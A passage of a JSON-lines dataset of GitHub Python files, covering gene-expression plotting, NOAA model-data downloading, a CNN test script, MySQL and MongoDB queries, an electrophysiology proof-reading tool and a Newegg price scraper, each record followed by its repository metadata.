(Real)_grp_{condition_2}_raw\",\n hue=\"max Z score\",\n size=\"max Z score\",\n linewidth=0,\n alpha=0.7,\n ax=axes[1],\n palette=cmap,\n )\n fig_raw.plot([-4, 4], [-4, 4], \"--k\")\n\n # Add labels\n fig.suptitle(f\"({xlabel}) vs ({ylabel})\", fontsize=16)\n fig.text(0.5, 0.04, xlabel, ha=\"center\", va=\"center\")\n fig.text(0.06, 0.5, ylabel, ha=\"center\", va=\"center\", rotation=\"vertical\")\n axes[0].set_title(\"using abs(log$_2$ Fold Change)\")\n axes[1].set_title(\"using log$_2$ Fold Change\")\n axes[0].set_xlabel(\"\")\n axes[1].set_xlabel(\"\")\n axes[0].set_ylabel(\"\")\n axes[1].set_ylabel(\"\")\n print(fig)\n\n\ndef get_and_save_DEG_lists(\n merged_one_condition_df, condition, p_threshold, z_threshold\n):\n \"\"\"\n Get list of DEGs using traditional criteria (log2FC and p-value)\n and using z-score cutoff. Return different combinations of gene\n lists.\n\n Arguments\n ---------\n merged_one_condition_df: df\n df of results for one of the E-GEOD-33245 conditions ('1v2', '1v3', '1v4' or '1v5')\n returned from `merge_abs_raw_dfs`\n condition: str\n Condition from E-GEOD-33245 associated with 'merged_one_condition_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n \"\"\"\n # Get DEGs using traditional criteria\n degs_traditional = list(\n (\n merged_one_condition_df[\n (merged_one_condition_df[f\"Test statistic (Real)_grp_{condition}\"] > 1)\n & (\n merged_one_condition_df[f\"Adj P-value (Real)_grp_{condition}\"]\n < p_threshold\n )\n ]\n .set_index(\"Gene ID\")\n .index\n )\n )\n print(f\"No. of DEGs using traditional criteria: {len(degs_traditional)}\")\n\n # Get predicted specific DEGs using z-score cutoff\n degs_specific = list(\n (\n merged_one_condition_df[\n (merged_one_condition_df[f\"Test statistic (Real)_grp_{condition}\"] > 1)\n & (\n merged_one_condition_df[f\"abs(Z score)_grp_{condition}\"].abs()\n > z_threshold\n )\n ]\n .set_index(\"Gene ID\")\n .index\n )\n )\n print(f\"No. of specific DEGs using z-score: {len(degs_specific)}\")\n\n # Get predicted generic DEGs using z-score cutoff\n # Z-score cutoff was found by calculating the score\n # whose invnorm(0.05/5549). Here we are using a p-value = 0.05\n # with a Bonferroni correction for 5549 tests, which are\n # the number of P. aeruginosa genes\n degs_generic = list(\n (\n merged_one_condition_df[\n (merged_one_condition_df[f\"Test statistic (Real)_grp_{condition}\"] > 1)\n & (\n merged_one_condition_df[f\"abs(Z score)_grp_{condition}\"].abs()\n < z_threshold\n )\n ]\n .set_index(\"Gene ID\")\n .index\n )\n )\n print(f\"No. of generic DEGs using z-score: {len(degs_generic)}\")\n\n # Get intersection of DEGs using traditional and z-score criteria\n degs_intersect = list(set(degs_traditional).intersection(degs_specific))\n print(\n f\"No. of traditional DEGs that are specific by z-score criteria: {len(degs_intersect)}\"\n )\n\n # Get specific DEGs that were NOT found using traditional criteria\n degs_diff = list(set(degs_specific).difference(degs_intersect))\n print(\n f\"No. of specific DEGs that were not found by traditional criteria: {len(degs_diff)}\"\n )\n\n # Get intersection of DEGs using traditional and z-score criteria\n degs_intersect_generic = list(set(degs_traditional).intersection(degs_generic))\n print(\n f\"No. of traditional DEGs that are generic by z-score criteria: {len(degs_intersect_generic)}\"\n )\n\n # Save list of genes that interesect and those that do not\n merged_one_condition_df[\"Gene ID Name\"] = (\n merged_one_condition_df[\"Gene ID\"]\n + \" \"\n + merged_one_condition_df[f\"Gene Name_grp_{condition}\"].fillna(\"\")\n )\n\n # Set `Gene ID` as index\n merged_one_condition_df.set_index(\"Gene ID\", inplace=True)\n\n gene_id_names_intersect = merged_one_condition_df.loc[\n degs_intersect, \"Gene ID Name\"\n ]\n gene_id_names_diff = merged_one_condition_df.loc[degs_diff, \"Gene ID Name\"]\n gene_id_names_generic = merged_one_condition_df.loc[degs_generic, \"Gene ID Name\"]\n\n gene_lists_df = pd.DataFrame(\n {\n \"Traditional + specific DEGs\": gene_id_names_intersect,\n \"Specific only DEGs\": gene_id_names_diff,\n \"Generic DEGs\": gene_id_names_generic,\n }\n )\n\n return (\n gene_lists_df,\n degs_traditional,\n degs_specific,\n degs_generic,\n degs_intersect,\n degs_intersect_generic,\n degs_diff,\n )\n\n\ndef plot_volcanos(\n degs_intersect, degs_diff, merged_one_condition_df, condition, fig_title\n):\n \"\"\"\n Make volcano plots based on one condition from E-GEOD-33245. Color genes\n by gene lists created from `get_and_save_DEG_lists`\n\n Arguments\n ---------\n degs_intersect: list\n List of genes that were found to be DE using traditional criteria\n and were found to have a high z-score (specificity)\n degs_diff: list\n List of genes that were found to have a high log2 fold change and\n high z-score but were not found to be DE using traditional criteria\n merged_one_condition_df: df\n df of results for one of the E-GEOD-33245 conditions ('1v2', '1v3', '1v4' or '1v5')\n returned from `merge_abs_raw_dfs`\n condition: str\n Condition from E-GEOD-33245 associated with 'merged_one_condition_df'.\n Either '1v2', '1v3', '1v4' or '1v5'\n fig_title: str\n Title to describe condition\n \"\"\"\n fig, axes = plt.subplots(ncols=3, nrows=1, figsize=(15, 4))\n\n # Add columns for plotting\n merged_one_condition_df[\"FDR adjusted p-value plot\"] = -np.log10(\n merged_one_condition_df[f\"Adj P-value (Real)_grp_{condition}\"]\n )\n merged_one_condition_df[\"gene group\"] = \"none\"\n merged_one_condition_df.loc[\n degs_intersect, \"gene group\"\n ] = \"traditional + specific DEGs\"\n merged_one_condition_df.loc[degs_diff, \"gene group\"] = \"only specific DEGs\"\n\n colors = [\"lightgrey\", \"red\", \"blue\"]\n # Plot: log2FC vs p-value (traditional criteria)\n sns.scatterplot(\n data=merged_one_condition_df,\n x=f\"Test statistic (Real)_grp_{condition}_raw\",\n y=\"FDR adjusted p-value plot\",\n hue=\"gene group\",\n hue_order=[\"none\", \"traditional + specific DEGs\", \"only specific DEGs\"],\n style=\"gene group\",\n markers={\n \"none\": \".\",\n \"traditional + specific DEGs\": \"o\",\n \"only specific DEGs\": \"o\",\n },\n palette=colors,\n linewidth=0,\n alpha=0.5,\n ax=axes[0],\n )\n\n # Plot: log2FC vs z-score\n sns.scatterplot(\n data=merged_one_condition_df,\n x=f\"Test statistic (Real)_grp_{condition}_raw\",\n y=f\"abs(Z score)_grp_{condition}\",\n hue=\"gene group\",\n hue_order=[\"none\", \"traditional + specific DEGs\", \"only specific DEGs\"],\n style=\"gene group\",\n markers={\n \"none\": \".\",\n \"traditional + specific DEGs\": \"o\",\n \"only specific DEGs\": \"o\",\n },\n palette=colors,\n linewidth=0,\n alpha=0.5,\n ax=axes[1],\n )\n\n # Plot: z-score vs p-value\n sns.scatterplot(\n data=merged_one_condition_df,\n x=f\"abs(Z score)_grp_{condition}\",\n y=\"FDR adjusted p-value plot\",\n hue=\"gene group\",\n hue_order=[\"none\", \"traditional + specific DEGs\", \"only specific DEGs\"],\n style=\"gene group\",\n markers={\n \"none\": \".\",\n \"traditional + specific DEGs\": \"o\",\n \"only specific DEGs\": \"o\",\n },\n palette=colors,\n linewidth=0,\n alpha=0.5,\n ax=axes[2],\n )\n\n # Add labels\n fig.suptitle(fig_title, fontsize=16)\n axes[0].set_xlabel(\"log$_2$ Fold Change\")\n axes[1].set_xlabel(\"log$_2$ Fold Change\")\n axes[2].set_xlabel(\"Z-score\")\n axes[0].set_ylabel(\"FDR adjusted p-value\")\n axes[1].set_ylabel(\"Z-score\")\n axes[2].set_ylabel(\"FDR adjusted p-value\")\n axes[0].set_title(\"log$_2$ Fold Change vs p-value\")\n axes[1].set_title(\"log$_2$ Fold Change vs z-score\")\n axes[2].set_title(\"z-score vs p-value\")\n print(fig)\n\n\ndef plot_venn(degs_traditional, degs_specific, degs_generic):\n \"\"\"\n Create venn diagram to compare the genes that were found\n to be DE using traditional criteria vs genes that are\n specific (i.e. high z-score) or generic (i.e. low z-score)\n\n Arguments\n ---------\n degs_traditional: list\n List of genes found to pass traditional DE criteria\n (log2FC > 1 and FDR adjusted p-value < 0.05).\n degs_specific: list\n List of genes that were found to have log2 FC > 1\n and z-score > 4.44\n degs_generic: list\n List of genes that were found to have log2 FC > 1\n and z-score < 4.44\n \"\"\"\n fig, axes = plt.subplots(ncols=2, nrows=1, figsize=(15, 4))\n\n venn2(\n [set(degs_traditional), set(degs_specific)],\n set_labels=(\"Traditional\", \"Specific\"),\n ax=axes[0],\n )\n\n venn2(\n [set(degs_traditional), set(degs_generic)],\n set_labels=(\"Traditional\", \"Generic\"),\n ax=axes[1],\n )\n\n","repo_name":"greenelab/core-accessory-interactome","sub_path":"6_common_genes_analysis/find_common_DEGs/generic_expression_patterns_modules/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":30199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34715303585","text":"# -*- coding:utf-8 -*-\nfrom Login import *\nfrom lib_utils import *\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nconfig = ConfigParser.ConfigParser()\npath = os.path.join(os.path.dirname(__file__), '../../config/common.ini')\nconfig.read(path)\n\nshop_urn = config.get(\"common_urn\", \"shop_urn\")\nhome_urn = config.get(\"common_urn\", \"home_urn\")\ncontact = config.get(\"common_account\", \"contact\")\npassword = config.get(\"common_account\", \"password\")\ndomain = config.get(\"common_account\", \"domain\")\ninvite_code = config.get(\"common_account\", \"invite_code\")\ndb_service_config = json.loads(config.get(\"common_db\", \"db_service_config\"))\ndb_shop_config = json.loads(config.get(\"common_db\", \"db_shop_config\"))\nlogin_url = config.get(\"common_url\", \"login_url\")\nhome_page_url = 'https://' + domain + home_urn\nmyshoplaza_url = 'https://' + domain + shop_urn\n\n\nimg = \"http://120.79.196.159:8000/RF/logs/module/result.png\"\n# 获取图片\nimgs = upload_oss_py(img)[0]\npath_img = \"//cn.cdn.shoplazza.com/\" + upload_oss_py(img)[0]\n# image = {\"lastModified\": \"1520929852000\", \"lastModifiedDate\": \"2018-03-13T08:30:52.000Z\", \"name\": imgs,\n# \"originFileObj\": {\"uid\": \"rc-upload-1535093594875-2\"}, \"path\": imgs, \"percent\": \"100.00\",\n# \"status\": \"done\", \"type\": \"image/jpeg\", \"uid\": \"rc-upload-1535093594875-2\", \"url\": path_img}\nimage = {\"path\": imgs, \"alt\": \"\", \"aspect_ratio\": \"1.3333333333333333\", \"height\": \"504\", \"src\": path_img,\n \"width\": \"672\", \"size\": \"53455\"}\n\nlogin = Login()\ninit_cookie = {'b_cookie': login.login_b_py(), 'c_cookie': login.login_c_py()}\n","repo_name":"hama/RF_Project","sub_path":"lib/customlib/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38838333988","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport glob\nimport os.path\nimport sys\nimport time\nfrom datetime import datetime\nimport multiprocessing as mp\nfrom multiprocessing import Process\nfrom pathlib import Path\n\nimport numpy as np\nimport s3fs\nfrom boto3 import client\nfrom botocore import UNSIGNED\nfrom botocore.client import Config\n\n\"\"\"\n download_s3_file\n downloads the nwp file\n\n ARGS:\n bucket: f string ::\n ingest_path : fstring :: file that has been downloaded\n output_path : fstring :: where you want file stored\n\n RETURNS:\n\n \"\"\"\n\n\ndef download_s3_file(bucket, ingest_path, output_path):\n fs = s3fs.S3FileSystem(anon=True, asynchronous=False)\n\n if fs.exists(f\"{bucket}/{ingest_path}\"):\n # Download file, will throw FileNotFoundError if non existent\n fs.download(f\"{bucket}/{ingest_path}\", output_path)\n print(f\"✅ downloading {ingest_path} & saving to {output_path}\")\n else:\n print(f\"‼️ file not found {ingest_path}\")\n\n\n\"\"\"\nlist_s3_files\nreturns a list of files that have been downloaded for nwp\n\n ARGS:\n bucket\n model : string :: the model to be downloaded\n date : fstring :: year-month-day\n init_time : double :: 00\n data_type : string :: file format\n\n RETURNS:\n list :: the files that exist from dowload in a list\n\n \"\"\"\n\n\ndef list_s3_files(bucket, model, date, init_time, data_type):\n conn = client(\"s3\", config=Config(signature_version=UNSIGNED))\n\n if model == \"nam\":\n prefix = f\"{model}.{date}/\"\n elif model == \"gfs\":\n prefix = f\"{model}.{date}/{init_time}/atmos/\"\n elif model == \"hrrr\":\n prefix = f\"{model}.{date}/conus/\"\n\n response = conn.list_objects_v2(\n Bucket=bucket, Prefix=f\"{prefix}{model}.t{init_time}z.{data_type}\"\n )\n files = response.get(\"Contents\")\n if files:\n all_files = [file.get(\"Key\") for file in files]\n existing_files_for_download = [\n file\n for file in all_files\n if f\"t{init_time}z.{data_type}\" in file\n and not file.endswith(\"idx\")\n and not file.endswith(\"anl\")\n ]\n existing_files_for_download.sort()\n return existing_files_for_download\n else:\n return []\n\n\n\"\"\"\nget_avail_files\n\n ARGS:\n s3_bucket\n model : string :: the model to be downloaded\n year : string :: 0000\n month : string :: 00\n day : string :: 00\n init_time : double :: 00\n data_type : string :: file format\n split_loc:\n fh_loc:\n fxx_max:\n zfill:\n download_dir: fstring :: directory path where you want the data to be downloaded\n\n fname_out: string :: part of datapath name to be saved in your directory\n\n fname_end: string :: part of datapath name\n full_filelist_len:\n\n RETURNS:\n the files that exist for dowload\n\n \"\"\"\n\n\ndef get_avail_files(\n s3_bucket,\n model,\n year,\n month,\n day,\n init_time,\n data_type,\n split_loc,\n fh_loc,\n fxx_max,\n zfill,\n download_dir,\n fname_out,\n fname_end,\n full_filelist_len,\n):\n ii = 0\n len_files_for_download = [0]\n while True:\n files_for_download = list_s3_files(\n s3_bucket, model, f\"{year}{month}{day}\", init_time, data_type\n )\n files_for_download = [\n file\n for file in files_for_download\n if int(file.split(\".\")[split_loc][fh_loc:]) <= fxx_max\n ]\n print(files_for_download)\n len_files_for_download.append(len(files_for_download))\n for file in files_for_download:\n fxx = file.split(\".\")[split_loc][fh_loc:]\n if not os.path.isdir(download_dir):\n print(\"making directory: \", download_dir)\n Path(download_dir).mkdir(parents=True, exist_ok=True)\n # check to see if output_path is a directory. if not, create directory\n output_path = f\"{download_dir}{fname_out}{str(fxx).zfill(zfill)}{fname_end}\"\n if not os.path.exists(output_path):\n # if the file already exists, do not redownload\n download_s3_file(s3_bucket, file, output_path)\n # call the rest of the pipeline here, run_pipeline\n # running cleaning through the pipeline could be the \"sleep\" period\n print(\"FXX IS: \", fxx)\n else:\n print(f\"file has already been downloaded: {output_path}\")\n\n # STOP WHILE LOOP IF ALL DESIRED FILES HAVE BEEN DOWNLOADED ON OUR SIDE\n if os.path.isdir(download_dir):\n files_downloaded = glob.glob(f\"{download_dir}{fname_out}*{fname_end}\")\n num_files_downloaded = len(files_downloaded)\n print(num_files_downloaded)\n if num_files_downloaded >= full_filelist_len:\n print(\"exiting from while loop\")\n break\n\n # if no additional files are available compared to last try but the full_filelist_len has not been reached yet...\n if len_files_for_download[-1] == len_files_for_download[-2]:\n ii += 1\n print(\"same number of available files as last try. ii=\", ii)\n if (\n ii > 10\n ): # stop waiting for additional file if we have tried 10 separate times\n print(\"waited too long for new file, exiting while loop\")\n break\n\n # try again in 90 seconds\n print(\"sleep: \", datetime.now())\n time.sleep(90)\n\n\n# main\ndef main(model, data_type, init_date, init_time):\n month = str(init_date.month).zfill(2)\n print(\"Month: \", month)\n year = init_date.year\n print(\"Year\", year)\n day = str(init_date.day).zfill(2)\n\n # where you want the files to download\n download_dir = f\"/home/aevans/ai2es/{model.upper()}/{year}/{month}/\"\n print(\"Downloand_dir: \", download_dir)\n\n if model == \"nam\":\n s3_bucket = f\"noaa-{model}-pds\"\n else:\n s3_bucket = f\"noaa-{model}-bdp-pds\"\n\n if model == \"nam\":\n fxx_max = 84\n split_loc, fh_loc = -3, -2\n fname_out = f\"nam_218_{year}{month}{day}_{init_time}00_\"\n fname_end = \".grb2\"\n zfill = 3\n full_filelist_len = len(\n np.arange(0, 37, 1).tolist() + np.arange(39, 85, 3).tolist()\n )\n elif model == \"gfs\":\n fxx_max = 96\n split_loc, fh_loc = -1, 1\n fname_out = f\"gfs_4_{year}{month}{day}_{init_time}00_\"\n fname_end = \".grb2\"\n zfill = 3\n full_filelist_len = len(np.arange(0, 99, 3))\n elif model == \"hrrr\":\n fxx_max = 18\n split_loc, fh_loc = -2, -2\n fname_out = f\"{year}{month}{day}_hrrr.t{init_time}z.wrfsfcf\"\n fname_end = \".grib2\"\n zfill = 2\n full_filelist_len = len(range(0, 19))\n\n get_avail_files(\n s3_bucket,\n model,\n year,\n month,\n day,\n init_time,\n data_type,\n split_loc,\n fh_loc,\n fxx_max,\n zfill,\n download_dir,\n fname_out,\n fname_end,\n full_filelist_len,\n )\n\n print(\n f\"full download for {init_time}z initialization of the {model.upper()} complete!\"\n )\n\n\n# multiprocessing v2\n# good for bulk cleaning\nmodels = [\"gfs\", \"hrrr\", \"nam\"]\ndata_type_dict = {\"gfs\": \"pgrb2.0p50\", \"nam\": \"awphys\", \"hrrr\": \"wrfsfc\"}\ninit_time = \"00\"\n\n\nfor model in models:\n for month in np.arange(1, 13):\n init_date = datetime(2022, month, 1)\n\n # Step 1: Init multiprocessing.Pool()\n pool = mp.Pool(mp.cpu_count())\n init_date = datetime(2022, month, 1)\n\n # Step 2: `pool.apply` the `howmany_within_range()`\n results = pool.apply(\n main, args=(model, data_type_dict.get(model), init_date, init_time)\n )\n\n # Step 3: Don't forget to close\n pool.close()\n","repo_name":"shmaronshmevans/nwp_bias","sub_path":"src/bias/s3_download.py","file_name":"s3_download.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"35249860450","text":"#68. ソート\n\nimport json\nfrom pymongo import MongoClient\nfrom pymongo import DESCENDING\nclient = MongoClient('localhost', 27017)\n\ndb = client.kyoko\nco = db.nlp_collection\n\ndata = co.find({\"tags.value\": \"dance\"})\nsort = data.sort(\"rating.count\", DESCENDING)\n\nfor index, value in enumerate(sort, start = 1):\n print(\"{}\\t{}\".format(index, value.get(\"name\")))\n if index == 10:\n break\n","repo_name":"Akai-Kumako/100knock","sub_path":"Chapter7/68.py","file_name":"68.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"684390726","text":"#!/usr/bin/env python3\n\"\"\" Module for storing the sum_list() method definition. \"\"\"\nfrom typing import List\n\n\ndef sum_list(input_list: List[float]) -> float:\n \"\"\" Returns the adition of the given list of float numbers. \"\"\"\n a: float = 0.0\n for num in input_list:\n a += num\n return (a)\n","repo_name":"DiegoCol93/holbertonschool-web_back_end","sub_path":"0x00-python_variable_annotations/5-sum_list.py","file_name":"5-sum_list.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23361445733","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 10:21:03 2022\n\n@author: barbara\n\"\"\"\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport numpy as np\nimport os\nimport pandas as pd\nfrom scipy.signal import resample\nfrom abf_files_loader import load_abf\nfrom butter import lowpass\nfrom get_data import get_format_data\nfrom proof_read_gui import MiniSpontProof\nfrom txt_files_loader import load_txt\n\n\nroot = os.getcwd() + '/'\nresults_path = 'results/results.xlsx'\nrecording_dir = 'recordings/'\n\ncheck_excel = False\ntrials = 0\n\nwhile not check_excel:\n # get file name and channel to proof-read\n recording_file = input('Enter the file name: ')\n channel = input('Enter the channel number: ')\n\n # define the sheet_name\n if ('.abf' in recording_file) or ('.txt' in recording_file):\n sheet_name = recording_file[:-4] + '_' + channel\n else:\n print('Please, provide the file name with extention')\n trials += 1\n continue\n \n # try to load the results\n try:\n results = pd.read_excel(root + results_path, sheet_name=sheet_name)\n check_excel = True\n except ValueError:\n print('''Either the recording file or the channel was not found in the results.xlsx file. Please, try again.''')\n trials += 1\n if trials >= 5:\n exit()\n\n# try to load the summary results sheet\ntry:\n summary_results = pd.read_excel(root + results_path,\n sheet_name='Summary results')\nexcept ValueError:\n print('There is a problem with the results.xlsx file. Make sure there is a summary_results sheet')\n\n# the name of the recordings files should be speficied with extentions in the\n# metadata.xlsx file. The format that can be used are either abf or txt.\nif ('.abf' not in recording_file) and ('.txt' not in recording_file):\n print('The extention of the recording file (.abf or .txt) should be specified in the metadata.xlsx file')\n exit()\n \n# try to load the recording_file\nif '.abf' in recording_file:\n try:\n data = load_abf(root + recording_dir + recording_file)\n except FileNotFoundError:\n print('The recording file was not found')\n exit()\nif '.txt' in recording_file:\n try:\n data = load_txt(root + recording_dir + recording_file)\n except FileNotFoundError:\n print('The recording file was not found')\n exit() \n \n# get metadata\nfirst_sweep = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Analysis start at sweep (number)']\n\nfirst_point = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Cut sweeps first part (ms)']\n\nlast_point = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Cut sweeps last part (ms)']\n\nanalysis_end = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Analysis length (sec)']\n\nfs = summary_results.loc[(\n summary_results['Recording filename'] == recording_file) & (\n summary_results['Channel'] == int(channel)\n )]['Sampling rate (Hz)']\n\nfs = int(fs.iloc[0])\nanalysis_end = int(analysis_end.iloc[0] * fs)\n\nfor k, v in data.items():\n sweep_length = v[0].shape[0]\n \nfirst_sweep = int(first_sweep.iloc[0] - 1)\nfirst_point = int(first_point.iloc[0] * (fs / 1000))\nlast_point = int(sweep_length - last_point.iloc[0] * (fs / 1000))\n\n# try to get the relevant channel\nch = ['Ch' + str(channel)]\ndata = get_format_data(data, ch, first_sweep, first_point, last_point)\nif len(data) == 0:\n print('The channel was not found in the recording file.')\n exit()\n\n# get the portion of the recording been analyzed\nsignal = data[int(channel)]\nsignal = signal[:analysis_end]\n\n# resample the signal if fs != 20000\nif fs != 20000:\n signal = resample(signal, int(signal.shape[0] * 20000 / fs))\n\n# low pass filter the recording\nsignal_lp = lowpass(signal, 800, order=1)\n\n# get x, y coordinates of detected events\nx = np.array(results['x (ms)'])\ny = np.array(results['y (pA)'])\n\ntime = np.linspace(0,\n round(signal_lp.shape[0] / (fs / 1000)) - 1 / (fs / 1000),\n signal_lp.shape[0])\n\noriginal_values = np.array(list(zip(x, y)), dtype='object')\n\n# start the proof-reading\nmini_spont_proof = MiniSpontProof(root, results_path, sheet_name, time,\n signal_lp, original_values, fs)\n\n","repo_name":"Imbrosci/spontaneous-postsynaptic-currents-detection","sub_path":"proof_read_results.py","file_name":"proof_read_results.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29812770672","text":"from scipy.misc import imread\nimport numpy as np\nimport torch.nn as nn\nimport torch\nimport csv\nimport sys\nimport os\n\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(1, 64, kernel_size=4, stride=2, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=4, stride=2, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n )\n self.classifier = nn.Sequential(\n nn.Linear(64*7*7, 10),\n nn.Softmax(dim=1)\n )\n\n def forward(self, image):\n feature = self.conv(image)\n output = self.classifier(feature.view(feature.size(0), -1))\n return output\n\n\ndef main(directory, output_csv):\n checkpoint = torch.load('best_checkpoint.pth.tar', map_location=lambda storage, loc: storage)\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n model = CNN().to(device)\n model.load_state_dict(checkpoint['state_dict'])\n\n print(\"Selected checkpoint training acc: {:.6f} validation acc: {:.6f}\".format(\n checkpoint['accuracy'][checkpoint['epoch'] - 1],\n checkpoint['val_accuracy'][checkpoint['epoch'] - 1])\n )\n\n with torch.no_grad():\n model.eval()\n with open(output_csv, \"w\") as f:\n s = csv.writer(f, delimiter=',', lineterminator='\\n')\n s.writerow([\"id\", \"label\"])\n for imagefile in sorted(os.listdir(directory)):\n image = imread(os.path.join(directory, imagefile)) / 255\n image = np.expand_dims(image, axis=0)\n image = torch.tensor(image, dtype=torch.float, device=device).unsqueeze(0)\n\n output = model(image)\n result = torch.max(output, dim=1)[1]\n\n idx = os.path.splitext(os.path.basename(imagefile))[0]\n s.writerow([idx, result.item()])\n\n\nif __name__ == '__main__':\n directory = sys.argv[1]\n output_csv = sys.argv[2]\n main(directory, output_csv)\n","repo_name":"fanoping/Computer-Vision","sub_path":"hw2/hw2-3_test.py","file_name":"hw2-3_test.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"70157360441","text":"\nimport subprocess as sp\nimport json\n\nclass RpcEndPoint:\n def __init__(self,exeName):\n self.exeName = exeName\n self.next_id = 0\n \n def call_method(self,method,params):\n self.next_id = self.next_id + 1\n rpc_call = {'id':self.next_id, 'method': method, 'params': params}\n p1 = sp.Popen(self.exeName,stdin=sp.PIPE,stdout=sp.PIPE)\n outdata_json = p1.communicate(input=json.dumps(rpc_call))\n outdata=json.loads(outdata_json[0])\n if outdata['id'] != rpc_call['id']:\n raise Exception('rpc return id mismatch')\n if 'error' in outdata:\n raise Exception('service error',outdata['error'])\n \n return outdata['result']\n\n\n","repo_name":"baylisslabs/stratotune","sub_path":"src/bit.shared.testutil/jsonpiperpc.py","file_name":"jsonpiperpc.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42317321659","text":"#!/usr/bin/python3\n\"\"\"\nscript that lists all cities from the database hbtn_0e_4_usa\n\"\"\"\nimport MySQLdb\nfrom sys import argv\n\nif __name__ == '__main__':\n\n # Connect to the MySQL database\n db = MySQLdb.connect(host='localhost',\n port=3306,\n user=argv[1],\n passwd=argv[2],\n db=argv[3])\n\n # Create a cursor object to interact with the database\n cursor = db.cursor()\n\n # Use a prepared statement to avoid SQL injection\n query = \"SELECT cities.id, cities.name FROM cities \" \\\n \"JOIN states ON cities.state_id = states.id \" \\\n \"WHERE states.name LIKE BINARY %(state_name)s \" \\\n \"ORDER BY cities.id\"\n\n state_name = argv[4]\n\n # Execute the SQL query with a parameterized query\n cursor.execute(query, {\"state_name\": state_name})\n\n # Fetch all the rows and display them\n results = cursor.fetchall()\n\n # Check if there are results\n if results is not None:\n print(\", \".join([row[1] for row in results]))\n # Close the cursor and database connection\n cursor.close()\n db.close()\n","repo_name":"Shewanji/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4092682682","text":"import bs4\r\nfrom urllib.request import urlopen as openURL\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\nproductDict = {'A': \"4k Monitors\", 'B': \"1TB SSDs\", 'C': \"Powerful Graphics Cards\"}\r\n\r\n\r\ndef getPage(url) -> [[\"item_container\"]]:\r\n \"\"\"open URL and returns its HTML code parsedPage\"\"\"\r\n pageList = []\r\n\r\n sortByRating = \"&Order=RATING\"\r\n pageSize = \"&PageSize=96\"\r\n pageNumber = \"&page=\"\r\n numPages = numOfProducts // 96 + 1\r\n for n in range(numPages):\r\n newUrl = url + sortByRating + pageSize + pageNumber + str(n + 1)\r\n webData = openURL(newUrl)\r\n webText = webData.read()\r\n webData.close()\r\n\r\n parsedPage = soup(webText, \"html.parser\")\r\n pageList.append(parsedPage.findAll(\"div\", {\"class\", \"item-container\"}))\r\n return pageList\r\n\r\n\r\ndef displayLowestPriceoftheBestRated(allPages: [[\"item_container\"]], productName: str, numOfProducts: int):\r\n \"\"\"find and display product with lowest price on page\"\"\"\r\n lowestPrice = -1\r\n lowestPriceTitle = \"\"\r\n processedProducts = 0\r\n for page in allPages: # loop through each page of 96 products per page\r\n for product in page: # look through all 96 products on page\r\n if processedProducts == numOfProducts: # if searched num is what user asked for, we are done\r\n break\r\n\r\n allStrongs = product.findAll(\"strong\") # price is in one of the strong sections\r\n title = product.find(\"a\", {\"class\", \"item-title\"}) # title is found here with .text tag\r\n\r\n price = 0\r\n for sub in allStrongs:\r\n try:\r\n price = int(sub.string) # if doesnt error, price is now the price for this product\r\n except ValueError:\r\n continue\r\n\r\n if price != 0 and price < lowestPrice or lowestPrice == -1:\r\n lowestPrice = price\r\n lowestPriceTitle = title\r\n\r\n processedProducts += 1\r\n\r\n print(f\"The cheapest product amongst the {numOfProducts} best rated {productName} on Newegg is:\\n\"\r\n f\" {lowestPriceTitle.text}\\n Price: ${str(lowestPrice)}\\n\")\r\n\r\n\r\nif __name__ == '__main__':\r\n productSelection = input(\"Which product(s) would you like to look at?\\n\" +\r\n \" A) 4k Monitors\\n\" +\r\n \" B) 1TB SSDs\\n\" +\r\n \" C) Powerful Graphics Cards\\n\" +\r\n \" D) All of the above\\n\").strip().upper()\r\n while True:\r\n try:\r\n numOfProducts = int(input(\"How many of the top products would you like to process?\\n\"))\r\n if numOfProducts > 0:\r\n break\r\n except ValueError:\r\n \"do nothing\"\r\n print(\"Please enter a valid positive integer.\")\r\n\r\n if productSelection in 'AD':\r\n FourKmonitorUrlRating = \"https://www.newegg.com/p/pl?N=100160979%20601305587\"\r\n displayLowestPriceoftheBestRated(getPage(FourKmonitorUrlRating), 